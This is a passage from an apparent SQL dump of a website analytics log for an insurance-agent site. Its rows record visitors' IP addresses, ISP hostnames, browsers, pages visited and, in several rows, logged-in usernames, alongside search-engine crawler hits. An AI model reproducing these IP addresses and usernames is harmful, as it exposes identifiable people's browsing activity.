1080','','','','SimkowitzCo','','0','51',0),(17403,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460647039','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17405,'0b_af2e9c6bd34bc4a919376b22091a6faf','1460647291','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17408,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460647306','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17409,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460647306','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17412,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460647523','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(17415,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460647524','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17417,'0b_499dfc9b8a709e0ba54633ee27bf55bc','1460647541','204.79.180.62','204.79.180.62','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.bing.com/search?q=John+Hancock+Form+LTC-02+NY&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','John Hancock Form LTC-02 NY',1,'Win7','IE 9','us','','Bing','','','','','0','0',0),(17418,'0b_3feed52fc64b7bf004247b1bc26cd69d','1460648007','86.106.17.210','210-ST-SERVER1-','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(17420,'0b_8d7b76046b5707ecb4571348689db226','1460649122','66.249.64.29','crawl-66-249-64-29.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17421,'0b_35171c7e777b8e524d6d85cc84b9cb0f','1460649629','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17423,'0b_35171c7e777b8e524d6d85cc84b9cb0f','1460649631','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17424,'0b_774bfdf15b9e6742d71342401516f303','1460650592','76.30.11.28','c-76-30-11-28.hsd1.tx.comcast.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(17426,'0b_774bfdf15b9e6742d71342401516f303','1460650594','76.30.11.28','c-76-30-11-28.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(17427,'0b_14d3744832ee42fb0006a64fed419ced','1460650618','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17430,'0b_14d3744832ee42fb0006a64fed419ced','1460650664','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17433,'0b_14d3744832ee42fb0006a64fed419ced','1460650668','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17436,'0b_774bfdf15b9e6742d71342401516f303','1460650739','76.30.11.28','c-76-30-11-28.hsd1.tx.comcast.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(17439,'0b_b16a3cdb233dacf6e5333f9894692165','1460651303','157.55.39.132','msnbot-157-55-39-132.search.msn.com','[404] /documents/Eliminatingirpdf.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17442,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652703','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(17445,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652706','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17448,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652731','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17450,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652739','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(17453,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652764','104.246.54.244','ool-68f636f4.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(17456,'0b_4fc9c860f1f4b4925a80fafb4cd1d4f7','1460652795','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(17457,'0b_14d3744832ee42fb0006a64fed419ced','1460653974','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(17459,'0b_14d3744832ee42fb0006a64fed419ced','1460653982','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17462,'0b_68ba99b03f410cc69b0676e880da4506','1460654742','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17465,'0b_68ba99b03f410cc69b0676e880da4506','1460654742','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17468,'0b_68ba99b03f410cc69b0676e880da4506','1460654744','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17471,'0b_68ba99b03f410cc69b0676e880da4506','1460654747','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(17474,'0b_68ba99b03f410cc69b0676e880da4506','1460654755','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(17477,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460655452','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17478,'0b_0138d98c385508f9cf26c5eb070149fe','1460657054','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwjO9rfC247MAhVENj4KHQxABEYQ_BcIgwEwCw&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&sig2=oIBBa_Po6EDy82_YPrPcgA','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(17481,'0b_0138d98c385508f9cf26c5eb070149fe','1460657057','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(17483,'0b_0138d98c385508f9cf26c5eb070149fe','1460657063','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(17486,'0b_0138d98c385508f9cf26c5eb070149fe','1460657191','108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','joel32','','0','51',0),(17489,'0b_1065d523d23e48144f542ab7d033f653','1460657288','157.55.39.31','msnbot-157-55-39-31.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17490,'0b_d86bf756ab81b045726768a2b771e0c8','1460657324','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17493,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460657778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17495,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460657781','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17496,'0b_0bc10fbfa13bb665157482482fe620c8','1460658769','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17499,'0b_df207968ba34897bfec1f220c8136d7e','1460659041','176.31.39.23','176.31.39.23','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(17502,'0b_2b04f96815e5711ab660ce8ae2384f08','1460659192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17505,'0b_2a4fc7f6bbb4ba3e79bab753429a6730','1460659598','159.122.253.173','ad.fd.7a9f.ip4.static.sl-reverse.com','/?author=1','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','us','','','','','','','0','0',0),(17508,'0b_8633f47582b5734a5d9fc39656ff2f48','1460660703','192.227.244.74','192-227-244-74-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(17511,'0b_0e9428b1d1ce378523530740321ae2e4','1460661077','198.167.168.70','198.167.168.70.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17514,'0b_63ca9866464fb21969019e0416444cee','1460661080','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17516,'0b_63ca9866464fb21969019e0416444cee','1460661522','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17519,'0b_dd183b5c59844266a25e9012808b32ff','1460661885','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17522,'0b_dd183b5c59844266a25e9012808b32ff','1460661887','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17523,'0b_f1363a823b3ac65b488044b7f3c7289d','1460662469','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(17525,'0b_f1363a823b3ac65b488044b7f3c7289d','1460662469','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(17526,'0b_f1363a823b3ac65b488044b7f3c7289d','1460662471','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(17528,'0b_f1363a823b3ac65b488044b7f3c7289d','1460662488','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(17529,'0b_a1d8884cda94f5bb5bbbee6072dc68b4','1460662754','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17532,'0b_14d3744832ee42fb0006a64fed419ced','1460663097','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(17535,'0b_14d3744832ee42fb0006a64fed419ced','1460663129','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(17537,'0b_b4dd4a9ca87e8cb2308a044b2ab4ac1c','1460663693','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(17538,'0b_b4dd4a9ca87e8cb2308a044b2ab4ac1c','1460663693','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(17540,'0b_b4dd4a9ca87e8cb2308a044b2ab4ac1c','1460663694','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(17543,'0b_b4dd4a9ca87e8cb2308a044b2ab4ac1c','1460663698','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(17546,'0b_999c46c3853a62f75930deed7c4bf384','1460664824','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17549,'0b_999c46c3853a62f75930deed7c4bf384','1460664826','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17550,'0b_9c146cf25c453037b839b0a0ecaeaa4f','1460666841','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17553,'0b_70bd23a2676b8fe5338fe0ab9c7a03b5','1460666990','66.249.83.141,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(17556,'0b_e2be18b2adb972d5f990cb9f41529db6','1460666991','66.249.83.147,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(17559,'0b_89ce2717e6cc2be96ba87645bbfd4b66','1460670670','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17562,'0b_ce315dc4d1edc43413294b56dc93f0e5','1460671444','46.229.170.193','46.229.170.193','/','Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8','','',0,'Linux','Firefox 3','it','','','','','','','0','0',0),(17564,'0b_874cacba08fc3de7f104b10d2e969c7c','1460671484','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(17565,'0b_f8570b5d388b7b5345cf87a36c0beb39','1460673988','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17568,'0b_c72e9abddafec9679040bdfbaa77a9b0','1460676488','45.40.36.20','45-40-36-20-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(17570,'0b_cc976117959ffe88cd2ab36026ab92d5','1460677218','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(17573,'0b_a362d424e8e0d577f2ec2a6d08823078','1460677274','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17574,'0b_693ae03e707761da96afb12ec790b670','1460678077','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(17576,'0b_bf6992fb7398a32c9db91a2e33a25ca6','1460678079','100.43.81.146','spider-100-43-81-146.yandex.com','/case-status/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17579,'0b_bf6992fb7398a32c9db91a2e33a25ca6','1460678198','100.43.81.152','spider-100-43-81-152.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17580,'0b_b90c4fa346d764842300541b412f5768','1460678890','207.46.13.12','msnbot-207-46-13-12.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17583,'0b_9db120c04774e95555bf51ff8804d4c9','1460682130','157.55.39.90','msnbot-157-55-39-90.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17586,'0b_f62b940f6373b1f2b36f80955a7067ac','1460682354','180.76.15.161','baiduspider-180-76-15-161.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(17588,'0b_b1e0b2ddbb4723fd86a9e20a97343c58','1460683793','40.77.167.22','msnbot-40-77-167-22.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17589,'0b_aa8bb240e9a943c6d7465acd6b0fcfad','1460695260','124.202.191.35','124.202.191.35','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(17591,'0b_3ef346ac69609104128bc3b714bd3156','1460695299','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17594,'0b_3ef346ac69609104128bc3b714bd3156','1460695300','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(17595,'0b_86f6c03c057d9d3302bd37905db24379','1460695728','107.172.224.24','107-172-224-24-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(17597,'0b_281220a2be20a3c4e31b1045c4323efe','1460698980','157.55.39.51','msnbot-157-55-39-51.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17598,'0b_2bd6208eff3c27f63efebd9d085f19e7','1460699296','40.77.167.84','msnbot-40-77-167-84.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17600,'0b_2bd6208eff3c27f63efebd9d085f19e7','1460699301','40.77.167.84','msnbot-40-77-167-84.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; 